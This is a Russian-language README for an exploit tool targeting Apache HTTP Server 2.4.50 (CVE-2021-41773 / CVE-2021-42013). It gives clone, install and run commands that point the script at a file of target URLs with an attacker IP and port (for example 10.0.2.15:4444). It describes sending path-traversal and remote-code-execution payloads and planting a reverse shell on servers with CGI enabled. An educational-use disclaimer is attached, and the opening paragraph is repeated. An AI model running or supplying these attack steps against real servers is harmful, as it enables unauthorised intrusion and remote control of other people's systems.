
Apache-HTTP-Server-2.4.50-RCE Этот инструмент предназначен для тестирования серверов Apache на наличие уязвимости CVE-2021-41773 / CVE-2021-42013. Он предназначен только для образовательных целей и должен использоваться ответственно только на системах, на тестирование которых у вас есть явное разрешение.
Этот инструмент предназначен для тестирования серверов Apache на уязвимости CVE-2021-41773 / CVE-2021-42013. Он создан исключительно для образовательных целей и должен использоваться ответственно только на системах, на которые у вас есть явное разрешение на тестирование.
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <ВашIP> -port <Порт>
текстовый файл должен содержать URL цели
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Проверка версии Apache: Для каждого URL из указанного файла проверяется, работает ли сервер под управлением Apache версии 2.4.50.
Если сервер уязвим: предпринимается попытка эксплуатации сервера путем отправки полезных нагрузок для выполнения атак типа обхода каталогов или удаленного выполнения кода. Если CGI включен: предпринимается попытка внедрения реверс-шелла для получения удаленного доступа.
Только для образовательных целей: Скрипт предназначен для демонстрации того, как можно тестировать и эксплуатировать уязвимости. Использование этого скрипта против несанкционированных целей незаконно и неэтично.
Цель модификации: Добавлена дополнительная обработка ошибок, оптимизирована логика полезной нагрузки и RCE, удален CVE.